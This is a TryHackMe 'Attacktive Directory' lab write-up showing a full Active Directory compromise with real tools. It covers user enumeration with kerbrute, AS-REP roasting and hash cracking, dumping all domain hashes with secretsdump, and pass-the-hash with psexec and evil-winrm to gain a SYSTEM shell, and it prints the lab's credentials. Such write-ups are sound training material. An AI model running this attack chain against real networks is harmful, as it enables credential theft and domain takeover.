thm-AttacktiveDirectory-nl

Attacktive Directory – Try Hack Me

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play Attacktive Directory at Challenge

Task 1

Initiate the VPN connection and deploy the machine

Task 2 -> Impacket

Install Impacket, this is a collection of Python classes for working with network protocols. To learn more information about Impacket and have and overview about some of its tools you can look here.
Have a look at this Github repository to learn how to install it.

Task 3 -> Enumeration 1

We start by adding the IP address of our machine to the /etc/hosts

echo 10.10.166.159 spookysec.local >> /etc/hosts

Next we do a NMAP scan.

root@kali:~/thm# nmap -A 10.10.166.159 -oN aktivedirectory.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-08 05:16 EDT
Stats: 0:03:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.89% done; ETC: 05:20 (0:00:00 remaining)
Stats: 0:03:24 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.89% done; ETC: 05:20 (0:00:00 remaining)
Stats: 0:03:43 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 05:20 (0:00:00 remaining)
Stats: 0:03:43 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 05:20 (0:00:00 remaining)
Nmap scan report for spookysec.local (10.10.166.159)
Host is up (0.030s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-08 09:16:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-04-03T18:40:09
|_Not valid after: 2020-10-03T18:40:09
|_ssl-date: 2020-06-08T09:19:18+00:00; -1s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/8%Time=5EDE020D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=6/8%OT=53%CT=1%CU=30194%PV=Y%DS=2%DC=T%G=Y%TM=5EDE02F2
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U
OS:)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%
OS:O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%D
OS:F=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)

Network Distance: 2 hops
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-06-08 05:19:19
|_ start_date: N/A

TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 29.06 ms 10.11.0.1
2 29.30 ms spookysec.local (10.10.166.159)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 244.31 seconds
root@kali:~/thm#

Using the first scan we will use the ports discovered and run a more complete scan.

nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389 -A -T4 spookysec.local

nmapa

From this scan we discover the Domain Name of the machine as well as the the full AD domain.

Task 4 -> Enumeration 2

Using enum4linux we are able to enumerate ports 139 and 445. This tool has a quite lengthy output, therefore we will only post the important parts for the walkthrough sake.

enum4linux -A  spookysec.local

enum enum2

Once more, we managed retrieve information about the full AD domain name and the Domain Name of the machine plus some usernames that might be useful later on.

We follow using the tool Kerbrute, which can be installed using the command:

go get github.com/ropnop/kerbrute

Kerbrute is a tool that performs Kerberos pre-auth bruteforcing, in this case we will be using the username bruteforce feature.

~/go/bin/kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc 10.10.229.200 -d spookysec.local userlist.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/20/20 - Ronnie Flathers @ropnop

2020/07/20 13:35:52 > Using KDC(s):
2020/07/20 13:35:52 > 10.10.229.200:88
2020/07/20 13:35:52 > [+] VALID USERNAME: james@spookysec.local
2020/07/20 13:35:53 > [+] VALID USERNAME: svc-admin@spookysec.local
2020/07/20 13:35:54 > [+] VALID USERNAME: James@spookysec.local
2020/07/20 13:35:55 > [+] VALID USERNAME: robin@spookysec.local
2020/07/20 13:36:01 > [+] VALID USERNAME: darkstar@spookysec.local
2020/07/20 13:36:03 > [+] VALID USERNAME: administrator@spookysec.local
2020/07/20 13:36:06 > [+] VALID USERNAME: backup@spookysec.local
2020/07/20 13:36:08 > [+] VALID USERNAME: paradox@spookysec.local
2020/07/20 13:36:18 > [+] VALID USERNAME: JAMES@spookysec.local
2020/07/20 13:36:18 > [+] VALID USERNAME: puck@spookysec.local
2020/07/20 13:36:22 > [+] VALID USERNAME: Robin@spookysec.local
2020/07/20 13:36:42 > [+] VALID USERNAME: Administrator@spookysec.local
2020/07/20 13:37:28 > [+] VALID USERNAME: Darkstar@spookysec.local
2020/07/20 13:37:42 > [+] VALID USERNAME: Paradox@spookysec.local
2020/07/20 13:38:32 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2020/07/20 13:38:47 > [+] VALID USERNAME: ori@spookysec.local
2020/07/20 13:39:11 > [+] VALID USERNAME: ROBIN@spookysec.local
2020/07/20 13:41:39 > Done! Tested 100000 usernames (17 valid) in 346.729 seconds

E:\PENTEST>

Task 5 -> ASREPRoasting

From the output we are able to validate some active usernames.
Now that we have discovered a several usernames we can use a technique called ASREPRoasting, meaning if a user does not have the Kerberos preauthentication property selected it is possible to retrieve the password hash from that user. Impacket provides a tool called GetNPUsers.py which can query the AD and if the property above is not selective it will export their TGT.

root@kali:~/thm# python GetNPUsers.py spookysec.local/svc-admin
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

Password:
[*] Cannot authenticate svc-admin, getting its TGT
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:5aeae9f1e888ac620e344710bdb8deac$29852738d58f3c4a424be360def6579858e10b926fe0d26513a609e5825a873ab5d10226f92a490e357559ed477fc2ce36449de7c56768f98a69b5b63f0ce24b40cc1d9e750b0bcf664e2aa16ae82132d974dc165cab8fd4b21072fbd4d25d95f81226d3e1adb3151262a25afe2e65e0e22973b8d84ee7c7d8e8e6b46b82edc0249d1ea91e09ca638628019f704a03e2e2c998e452d6cc6ab06961fbf220db3ad6042a34c87855b28ca8c29891f6ae292c82b800a1d2d9aea18e081dd40bf50ed9ea9142bab643a6dd8290ac18c27c5805def58ba20e1648583c3248eb0a8098090527c290539b248a625e3b32bdc63ce3fd

We are able to retrieve a hash from the svc-admin account, now proceed to crack the hash using hashcat. In order to discover the mode we can have a look at the wiki page.
We have saved the previous hash in the hash.txt file.

Note: If you are using a VM the flag ‘–force’ is required.

hashcat -m 18200 hash.txt passwordlist.txt --force

I used John

E:\john-1.9.0-jumbo-1-win64\run>john 1.hash --wordlist=e:\pentest\hashcat\rockyou.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE4.1 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 6.44% (ETA: 09:47:24) 0g/s 500502p/s 500502c/s 500502C/s MERCENARIO..MALANDI
management2005 ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)
1g 0:00:00:11 DONE (2020-06-08 09:47) 0.08978g/s 524089p/s 524089c/s 524089C/s manaia010..mana741
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Task 6 -> Enumeration 3

Having user credentials we can attempt to log into SMB and explore any shares from the domain controller. This is possible with the tool smbclient, make sure to use the user ‘svc-admin’ as well as the previous cracked password.

smbclient -L spookysec.local --user svc-admin

smb

After exploring several shares, we found the file ‘backup_credentials.txt’.

smbclient \\\\spookysec.local\\backup --user svc-admin

smb2

Looking at the content of the file we can see it is encoded with Base64. To decode it simply use the following command:

root@kali:~/thm# base64 -d backup_credentials.txt 
backup@spookysec.local:backup2517860

Task 7 -> Elevating Privileges

Using the backup account we can use another tool from Impacket this time called ‘secretsdump.py’, we will be able to get all the password hashes that this user account has access to.

python secretsdump.py -just-dc backup@spookysec.local
root@kali:~/thm# python secretsdump.py -just-dc backup@spookysec.local
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

Password:backup2517860 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21::: spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b::: spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e::: spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b::: spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7::: spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::: spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb::: spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2::: spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705::: spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664::: spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809::: spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538::: ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bc33a070f5ae021dd6c33e464c859337::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49 Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff Administrator:des-cbc-md5:6d5edfa173d9d6ae krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902 krbtgt:des-cbc-md5:b94f97e97fabbf5d spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04 spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233 spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5 spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425 spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064 spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112 spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6 spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9 spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510 spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054 spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594 spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499 spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be spookysec.local\darkstar:des-cbc-md5:758af4d061381cea spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067 spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3 spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8 spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64 spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0 spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8 spookysec.local\paradox:des-cbc-md5:83988983f8b34019 spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347 spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86 spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166 spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157 spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518 spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922 spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197 spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89 ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:d765b5f072089acb3c5f893e497ef07e64b6022e2e55b85e3a30ffa4ceed5e20 ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:4a47099e21f536639b553406513f410f ATTACKTIVEDIREC$:des-cbc-md5:b53b3ea140bae0ec [*] Cleaning up... root@kali:~/thm#

Or we use it from windows

E:\PENTEST>secretsdump_windows.exe -just-dc backup@spookysec.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:backup2517860
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::

Now we are in possession of the Administrator password hash. The next step will be performing a Pass the Hash Attack. We can use another tool from Impacket called ‘psexec.py’, for this tool you must paste the complete Administrator hash in the following command:

root@kali:~/thm# psexec.py Administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file ifMyJYLW.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service erPK on spookysec.local.....
[*] Starting service erPK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
AttacktiveDirectory

C:\Windows\system32>

We could also use Evil-WinRm

root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.166.159 -u Administrator -H e4876a80a723612986d7609aa5ebc12b

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
AttacktiveDirectory
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Congratulations, you now have complete access to the system, feel free to navigate to each user Desktop and get the flags.

Author : Puckiestyle

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *